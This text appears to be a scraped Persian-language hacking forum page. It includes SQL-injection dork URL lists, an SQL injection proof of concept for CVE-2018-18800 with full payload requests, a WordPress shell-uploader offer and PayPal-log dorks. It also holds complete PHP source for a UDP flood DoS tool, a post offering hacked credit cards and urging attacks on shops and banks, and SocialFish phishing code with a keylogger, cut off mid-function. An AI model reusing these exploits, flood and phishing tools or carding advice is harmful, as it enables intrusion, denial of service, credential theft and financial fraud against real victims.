learnmore.php?cartID= links.php?catid= list.php?bookid= List.php?CatID= listcategoriesandproducts.php?idCategory= modline.php?id= myaccount.php?catid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= products.php?type= event.php?id= showfeature.php?id= home.php?ID= tas/event.php?id= profile.php?id= details.php?id= past-event.php?id= index.php?action= site/products.php?prodid= page.php?pId= resources/vulnerabilities_list.php?id= site.php?id= products/index.php?rangeid= global_projects.php?cid= publications/view.php?id= display_page.php?id= pages.php?ID= lmsrecords_cd.php?cdid= product.php?prd= cat/?catid= products/product-list.php?id= debate-detail.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= category.php?c= main.php?id= article.php?id= showproduct.php?productId= view_item.php?item= skunkworks/content.php?id= index.php?id= item_show.php?id= publications.php?Id= index.php?t= view_items.php?id= portafolio/portafolio.php?id= YZboard/view.php?id= index_en.php?ref= index_en.php?ref= category.php?id_category= main.php?id= main.php?id= calendar/event.php?id= default.php?cPath= pages/print.php?id= index.php?pg_t= _news/news.php?id= forum/showProfile.php?id= fr/commande-liste-categorie.php?panier= downloads/shambler.php?id= sinformer/n/imprimer.php?id= More_Details.php?id= directory/contenu.php?id_cat= properties.php?id_cat= forum/showProfile.php?id= downloads/category.php?c= index.php?cat= product_info.php?products_id= product_info.php?products_id= product-list.php?category_id= detail.php?siteid= projects/event.php?id= view_items.php?id= more_details.php?id= melbourne_details.php?id= more_details.php?id= detail.php?id= more_details.php?id= home.php?cat= idlechat/message.php?id= detail.php?id= print.php?sid= more_details.php?id= default.php?cPath= events/event.php?id= brand.php?id= toynbeestudios/content.php?id= show-book.php?id= more_details.php?id= store/default.php?cPath= property.php?id= product_details.php?id= more_details.php?id= product.php?shopprodid= product.php?productid= product.php?product= product.php?product_id= productlist.php?id= product.php?shopprodid= garden_equipment/pest-weed-control/product.php?pr= product.php?shopprodid= browsepr.php?pr= productlist.php?id= kshop/product.php?productid= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= products.php?categoryID= ?pid= bookpage.php?id= view_items.php?id= index.php?pagina= product.php?prodid= notify/notify_form.php?topic_id= php/index.php?id= content.php?cid= product.php?product_id= constructies/product.php?id= detail.php?id= php/index.php?id= index.php?section= product.php?****= show_bug.cgi?id= detail.php?id= bookpage.php?id= product.php?id= today.php?eventid= main.php?item= index.php?cPath= news.php?id= event.php?id= print.php?sid= news/news.php?id= module/range/dutch_windmill_collection.php?rangeId= print.php?sid= show_bug.cgi?id= product_details.php?product_id= products.php?groupid= projdetails.php?id= product.php?productid= products.php?catid= product.php?product_id= product.php?prodid= product.php?prodid= newsitem.php?newsID= newsitem.php?newsid= profile.php?id= ********s_in_area.php?area_id= productlist.php?id= productsview.php?proid= rss.php?cat= pub/pds/pds_view.php?start= products.php?rub= ogloszenia/rss.php?cat= print.php?sid= product.php?id= print.php?sid= magazin.php?cid= galerie.php?cid= www/index.php?page= view.php?id= content.php?id= board/read.php?tid= product.php?id_h= news.php?id= index.php?book= products.php?act= reply.php?id= isplay.php?ID= display.php?ID= ponuky/item_show.php?ID= default.php?cPath= main/magpreview.php?id= ***zine/board.php?board= content.php?arti_id= mall/more.php?ProdID= product.php?cat= news.php?id= content/view.php?id= content.php?id= index.php?action= board_view.php?s_board_id= KM/BOARD/readboard.php?id= board_view.html?id= content.php?cont_title= category.php?catid= mall/more.php?ProdID= publications.php?id= irbeautina/product_detail.php?product_id= print.php?sid= index_en.php?id= bid/topic.php?TopicID= news_content.php?CategoryID= front/bin/forumview.phtml?bbcode= cat.php?cat_id= stat.php?id= veranstaltungen/detail.php?id= more_details.php?id= english/print.php?id= print.php?id= view_item.php?id= content/conference_register.php?ID= rss/event.php?id= event.php?id= main.php?id= rtfe.php?siteid= category.php?cid= classifieds/detail.php?siteid= tools/print.php?id= channel/channel-layout.php?objId= content.php?id= resources/detail.php?id= more_details.php?id= detail.php?id= view_items.php?id= content/programme.php?ID= detail.php?id= default.php?cPath= more_details.php?id= content.php?id= view_items.php?id= default.php?cPath= book.php?id= view_items.php?id= products/parts/detail.php?id= category.php?cid= book.html?isbn= view_item.php?id= picgallery/category.php?cid= detail.php?id= print.php?sid= displayArticleB.php?id= knowledge_base/detail.php?id= bpac/calendar/event.php?id= mb_showtopic.php?topic_id= pages.php?id= content.php?id= exhibition_overview.php?id= singer/detail.php?siteid= Category.php?cid= detail.php?id= print.php?sid= category.php?cid= more_detail.php?X_EID= book.php?ISBN= view_items.php?id= category.php?cid= htmlpage.php?id= story.php?id= tools/print.php?id= print.php?sid= php/event.php?id= print.php?sid= articlecategory.php?id= print.php?sid= ibp.php?ISBN= club.php?cid= view_items.php?id= aboutchiangmai/details.php?id= view_items.php?id= book.php?isbn= blog_detail.php?id= event.php?id= default.php?cPath= product_info.php?products_id= shop_display_products.php?cat_id= print.php?sid= modules/content/index.php?id= printcards.php?ID= events/event.php?ID= more_details.php?id= default.php?TID= general.php?id= detail.php?id= event.php?id= referral/detail.php?siteid= view_items.php?id= event.php?id= view_items.php?id= category.php?id= cemetery.php?id= index.php?cid= content.php?id= exhibitions/detail.php?id=
  27. 2 امتیاز
    دوره آموزش SQL Injection PayPal/Credit Card/Debit Card # Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18800 # POC: # 1) # http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] # #[PATH]/accomodation.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; #56 #57 #58 #59 } #60 #61 $accomodation = ' | ' . $_GET['q']; #62 ?> #... GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:55:17 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/index.php?p=rooms&q=[SQL] # #[PATH]/room_rates.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; #56 #57 #58 }else{ #59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`"; #60 } #61 #62 $accomodation = ' | ' . @$_GET['q']; #63 ?> #... GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:58:47 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 3) # http://localhost/[PATH]/admin/login.php # #[PATH]/admin/login.php #... #58 if (isset($_POST['btnlogin'])) { #59 //form has been submitted1 #60 #61 $uname = trim($_POST['email']); #62 $upass = trim($_POST['pass']); #...
  28. 2 امتیاز
    پلاگین شل آپلودر جهت آپلود کردن شل در پنل وردپرس افزونه رو نصب و فعال میکنید، از طریق منو وارد پلاگین میشید نوع شل خودتون رو انتخاب و آپلود میکنید. پلاگین به صورت فایل ZIP پیوست شد. shell_uploader.zip
  29. 2 امتیاز
    دورد DOrk # Dork: inurl:"/wp-content/plugins/wp-shopping-cart/" # Dork: inurl:cart.php?m=features&id= # Dork: filetype:log inurl:paypal # Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro # Dork: inurl:"paypal.log" ext:log # Dork: inurl:"paypal" intitle:"index of" backup | db | access -github # Dork: intitle:"index of" inurl:"paypal" log # Dork: inurl:inc_paypalstoremanager.asp # Dork: "Powered by DUpaypal" -site:duware.com # Dork: intext:OpenCart inurl:index.php?route=common/dashboard
  30. 2 امتیاز
    DONGLE!.part2.rar DONGLE!.part3.rar DONGLE!.part4.rar DONGLE!.part5.rar
  31. 2 امتیاز
    UDP Flood <html> <head> Hex Booter <?php $ip = $_SERVER['REMOTE_ADDR']; ?> </head> <body> <center> <font color="blue"> <pre> _______(_ | o ,' `. |:::::::::\ | : `--. \ |::::::::::| | (-) \ : |::::::::::| | / @: | |::::::::::| | `: : : |::::::::::| | \- ;/ |::::::::::| | "---'=\ |::::::::::| | ___ / `.\ '-------,--'--.-' ____,:__/`-.:_,-* :' -------'-------`---`-----' `-. _, | --------------------------' `---" | <center><b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font> Don't Dos yourself<br><br></center> </pre> <STYLE> input{ background-color: blue; font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #666666; } button{ background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666; } body { background-color: #000000; } </style> <?php //UDP if(isset($_GET['host'])&&isset($_GET['time'])){ $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('d-m-y h:i:s')."<br>"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n"; echo '<br><br> <form action="'.$surl.'" method=GET> <input type="hidden" name="act" value="phptools"> IP: <br><input type=text name=host><br> Length (seconds): <br><input type=text name=time><br> <input type=submit value=Go></form>'; }else{ echo '<br><b>UDP Flood</b><br> <form action=? method=GET> <input type="hidden" name="act" value="phptools"> IP: <br><input type=text name=host value=><br> Length (seconds): <br><input type=text name=time value=><br><br> <input type=submit value=Go></form>'; } ?> </center> </body> </html>
  32. 2 امتیاز
    به نام خدا با سلام امروز با اینستا اسکنر اشنا میکنیم که توانای جمع اوری در یک پنل اختصاصی را فراهم کرده . دوربین را فعال کنید و اسکن را با استفاده از آن به عنوان منبع شروع کنید برای استفاده از canner.scan پنل جمع اوری QR code آموزش ساخت QR cod در قسمت های بعد instascan-master.zip code-scanner-master.zip
  33. 2 امتیاز
    درود در این قسمت میخوام کارت اعتباری ارسال کنم دوستان این کارت ها هک شده هست پس باید زود استفاده بشه 0.اسپم ممنوع 1.دوستان هک کردن کارت عتباری(خیلی اسونه ,0.حمله کنید به فروشگاه ها1.بانک هم میتونید بزنید):kolah
  34. 2 امتیاز
    learing Video And TOOLS BTC.COM Checker.rar
  35. 2 امتیاز
    Check Fish - check phishing url استفاده از SocialFish پیش نیازهای خاصی دارد ، مانند صفحه ورود به سیستم / فرم دارای قسمت های "ایمیل" و "رمز عبور". ما گزینه های اضافی را بررسی نکردیم ، اما اگر "یک نام ورود" (نه یک ایمیل) و "رمز عبور" در صفحه ورود به سیستم سفارشی باید SocialFish.py را تنظیم کنید. #!/usr/bin/python3 #-*- coding: utf-8 -*- # SOCIALFISH v3.0 # by: An0nUD4Y # ########################### from time import sleep from sys import stdout, exit, argv from os import system, path from distutils.dir_util import copy_tree import multiprocessing from urllib.request import urlopen, quote, unquote from platform import system as systemos, architecture from wget import download import re import json from subprocess import check_output RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m' def connected(host='http://duckduckgo.com'): #Checking network connection. try: urlopen(host) return True except: return False if connected() == False: #If there no network print (''' ....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _ / \/| [__ | | | | |__| | |___ | [__ |__| \o__ /\| ___] |__| |___ | | | |___ | | ___] | | \| {0}[{1}!{0}]{1} Network error. Verify your connection.\n '''.format(RED, DEFAULT)) exit(0) def checkNgrok(): #Check if user already have Ngrok server, if False - downloading it. if path.isfile('Server/ngrok') == False: print('[*] Downloading Ngrok...') if 'Android' in str(check_output(('uname', '-a'))): filename = 'ngrok-stable-linux-arm.zip' else: ostype = systemos().lower() if architecture()[0] == '64bit': filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype) else: filename = 'ngrok-stable-{0}-386.zip'.format(ostype) url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename download(url) system('unzip ' + filename) system('mv ngrok Server/ngrok') system('rm -Rf ' + filename) system('clear') checkNgrok() def end(): #Message when SocialFish exit system('clear') print (''' S O C I A L{2} |\ \ \ \ \ \ \ \ __ ___ | \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_ | >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} ) | / / / / / / / / |__\ < {1}FORGET{2} ) |/ / / / / / / / \_ {1}ME !{2} _) {1}F I S H{2} ~--___--~ {0}NOW WITH LIVE VICTIM ATTACK INFORMATION ] {0}A KEYLOGGER IS DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ] [ {0} Some more phising pages have been added in script. For a better Attack] [ {0} WELCOME TO SOCIALFISH V3.0 by-An0nUD4Y]\n {1}'''.format(GREEN, DEFAULT, CYAN)) def loadModule(module): print ('''{0} _.-=-._ .-, .' "-.,' / ( AnonUD4Y _. < `=.____.=" `._\\ [{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, DEFAULT) % module) def runPhishing(page, option2): #Phishing pages selection menu system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/') if option2 == '1' and page == 'Facebook': copy_tree("WebPages/fb_standard/", "Server/www/") if option2 == '2' and page == 'Facebook': copy_tree("WebPages/fb_advanced_poll/", "Server/www/") if option2 == '3' and page == 'Facebook': copy_tree("WebPages/fb_security_fake/", "Server/www/") if option2 == '4' and page == 'Facebook': copy_tree("WebPages/fb_messenger/", "Server/www/") elif option2 == '1' and page == 'Google': copy_tree("WebPages/google_standard/", "Server/www/") elif option2 == '2' and page == 'Google': copy_tree("WebPages/google_advanced_poll/", "Server/www/") elif option2 == '3' and page == 'Google': copy_tree("WebPages/google_advanced_web/", "Server/www/") elif page == 'LinkedIn': copy_tree("WebPages/linkedin/", "Server/www/") elif page == 'GitHub': copy_tree("WebPages/GitHub/", "Server/www/") elif page == 'StackOverflow': copy_tree("WebPages/stackoverflow/", "Server/www/") elif page == 'WordPress': copy_tree("WebPages/wordpress/", "Server/www/") elif page == 'Twitter': copy_tree("WebPages/twitter/", "Server/www/") elif page == 'Snapchat': copy_tree("WebPages/Snapchat_web/", "Server/www/") elif page == 'Yahoo': copy_tree("WebPages/yahoo_web/", "Server/www/") elif page == 'Twitch': copy_tree("WebPages/twitch/", "Server/www/") elif page == 'Microsoft': copy_tree("WebPages/live_web/", "Server/www/") elif page == 'Steam': copy_tree("WebPages/steam/", "Server/www/") elif page == 'iCloud': copy_tree("WebPages/iCloud/", "Server/www/") elif option2 == '1' and page == 'Instagram': copy_tree("WebPages/Instagram_web/", "Server/www/") elif option2 == '2' and page == 'Instagram': copy_tree("WebPages/Instagram_autoliker/", "Server/www/") elif option2 == '1' and page == 'VK': copy_tree("WebPages/VK/", "Server/www/") elif option2 == '2' and page == 'VK': copy_tree("WebPages/VK_poll_method/", "Server/www/") didBackground = True logFile = None for arg in argv: if arg=="--nolog": #If true - don't log didBackground = False if didBackground: logFile = open("log.txt", "w") def log(ctx): #Writing log if didBackground: #if didBackground == True, write logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(GREEN, "").replace(DEFAULT, "") + "\n") print(ctx) def waitCreds(): print("{0}[{1}*{0}]{1} Hi Hacker Everything has been completed.............. Start HAcking ".format(RED, DEFAULT)) print('''{0} _.-=-._ .-, .' "-.,' / ( AnonUD4Y_ ~.< `=.____.=" `._\\ [{1}*{0}]{1} WE HAVE ALSO DEPLOYED A KEYLOGGER. . [{1}*{0}]{1} YOU WILL GET VICTIM'S DEVICES INFO.{0}'''.format(CYAN, DEFAULT)) print(" {0}[{1}*{0}]{1} Waiting for credentials//Pressed keys//Victim's device info... \n".format(RED, DEFAULT)) while True: with open('Server/www/usernames.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: log('======================================================================'.format(RED, DEFAULT)) log(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt') log('======================================================================'.format(RED, DEFAULT)) log(' {0}***** HOPE YOU ARE ENJOYING. SO PLEASE MAKE IT MORE POPULAR *****{1}\n {0}{1}'.format(RED, DEFAULT)) creds.close() with open('Server/www/ip.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: ip = re.match('Victim Public IP: (.*?)\n', lines).group(1) resp = urlopen('https://ipinfo.io/%s/json' % ip) ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8')) if 'bogon' in ipinfo: log('======================================================================'.format(RED, DEFAULT)) log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) else: matchObj = re.match('^(.*?),(.*)$', ipinfo['loc']) latitude = matchObj.group(1) longitude = matchObj.group(2) log('======================================================================'.format(RED, DEFAULT)) log(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) log(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude)) log(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country'])) log(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city'])) system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt') log('======================================================================'.format(RED, DEFAULT)) creds.close() with open('Server/www/KeyloggerData.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: log('______________________________________________________________________'.format(RED, DEFAULT)) log(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines) system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt') log('______________________________________________________________________'.format(RED, DEFAULT)) creds.close() def runPEnv(): #menu where user select what they wanna use system('clear') print (''' {2}-{1} An0nUD4Y {2}|{1} An0nUD4Y {2}|{1} An0nUD4Y {2}- INDIA . . . . ' . ' ' ' ' ' ' ' ███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██ . ' '....' ..'. ' . ' . . ' ' ' {1}v3.0{2} ' . . . . . '. .' ' . ' ' '. ' {1}Updated_By--> AnonUD4Y_{2} _________________________________________________________________________________ {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ] {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ] _________________________________________________________________________________ {1}'''.format(GREEN, DEFAULT, CYAN)) for i in range(101): sleep(0.01) stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, DEFAULT) % i) stdout.flush() print ("\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, DEFAULT)) if 256 != system('which php'): #Checking if user have PHP print (" --{0}>{1} OK.".format(CYAN, DEFAULT)) else: print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(RED, DEFAULT)) exit(0) if input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF-An0nUD4Y > {1}".format(RED, DEFAULT, CYAN)).upper() != 'Y': #Question where user must accept education purposes system('clear') print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, DEFAULT)) exit(0) option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT)) if option == '1': loadModule('Facebook') option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT)) runPhishing('Facebook', option2) elif option == '2': loadModule('Google') option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT)) runPhishing('Google', option2) elif option == '3': loadModule('LinkedIn') option2 = '' runPhishing('LinkedIn', option2) elif option == '4': loadModule('GitHub') option2 = '' runPhishing('GitHub', option2) elif option == '5': loadModule('StackOverflow') option2 = '' runPhishing('StackOverflow', option2) elif option == '6': loadModule('WordPress') option2 = '' runPhishing('WordPress', option2) elif option == '7': loadModule('Twitter') option2 = '' runPhishing('Twitter', option2) elif option == '8': loadModule('Instagram') option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT)) runPhishing('Instagram', option2) elif option == '9': loadModule('Snapchat') option2 = '' runPhishing('Snapchat', option2) elif option == '10': loadModule('Yahoo') option2 = '' runPhishing('Yahoo', option2) elif option == '11': loadModule('Twitch') option2 = '' runPhishing('Twitch', option2) elif option == '12': loadModule('Microsoft') option2 = '' runPhishing('Microsoft', option2) elif option == '13': loadModule('Steam') option2 = '' runPhishing('Steam', option2) elif option == '14': loadModule('VK') option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT)) runPhishing('VK', option2) elif option == '15': loadModule('iCloud') option2 = '' runPhishing('iCloud', option2) else: exit(0) def runServeo(): system('ssh -o StrictHostKeyChecking=no -o 